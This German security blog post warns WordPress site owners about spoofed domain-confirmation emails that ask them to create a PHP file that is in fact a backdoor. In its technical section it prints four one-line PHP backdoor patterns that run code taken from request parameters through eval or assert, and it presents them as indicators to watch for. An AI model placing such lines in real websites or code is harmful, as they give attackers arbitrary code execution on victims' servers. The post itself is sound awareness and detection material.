Security Blog
Security Blog
Posted By Gregory

Vertrauen Sie keinen gefälschten Domain-Bestätigungs-E-Mails.

Sollten Sie jemals ein Schreiben jeglicher Art erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie dieses ignorieren.


English version: Do not trust those fake domain confirmation emails


Kürzlich erhielten einige meiner Mandanten merkwürdige E-Mails von ihren Domain-Registraren. Diese E-Mails enthielten die Aufforderung, die Domains der Mandanten zu bestätigen. Ich überprüfte eine dieser E-Mails und identifizierte sie schnell als Betrugsversuch . Alle E-Mails weisen das gleiche Muster auf und fordern dazu auf, im Stammverzeichnis einer Website eine PHP-Datei mit einem bestimmten Namen und vorgegebenem Inhalt zu erstellen. Der vorgeschlagene Inhalt dieser PHP-Datei enthält natürlich Schadcode, einen sogenannten Backdoor-Code. Dieser Code ermöglicht es Angreifern, beliebige Aktionen auf der Website des Opfers auszuführen.

Sollten Sie jemals einen Brief erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, ignorieren Sie ihn unbedingt. Ausnahmslos. Selbst wenn der Brief vom Präsidenten oder Ihrer Mutter stammt.

Betrügerische E-Mails wirken aufgrund einer scheinbar legitimen Absenderadresse authentisch. Es handelt sich jedoch um E-Mail-Spoofing. Sie erwarten ja auch keine gefälschte E-Mail von Freunden oder Ihrem Domain-Registrar, oder? Falsch! Jede E-Mail kann eine beliebige Absenderadresse haben. Die meisten E-Mail-Server und -Clients überprüfen die Absenderadresse nicht. Daher kann es sich verdächtig anfühlen, wenn Sie eine E-Mail von einem Hacker erhalten. Vertrauen Sie keiner E-Mail von einem bekannten Absender, wenn diese zu verdächtigen Aktionen auffordert, wie beispielsweise zur Installation von Code auf Ihrer Website oder einer Anwendung auf Ihrem Computer.

Technische Details

Gefälschte E-Mails enthalten üblicherweise einige der folgenden PHP-Zeilen.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Zur Information: base64_decode, eval und assert sind bekannte Indikatoren für verdächtigen oder bösartigen PHP-Code.

Siehe auch: Plugin-Inspektor deckt Sicherheitslücken bei anderen Plugins auf


I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.

View Comments
There are currently no comments.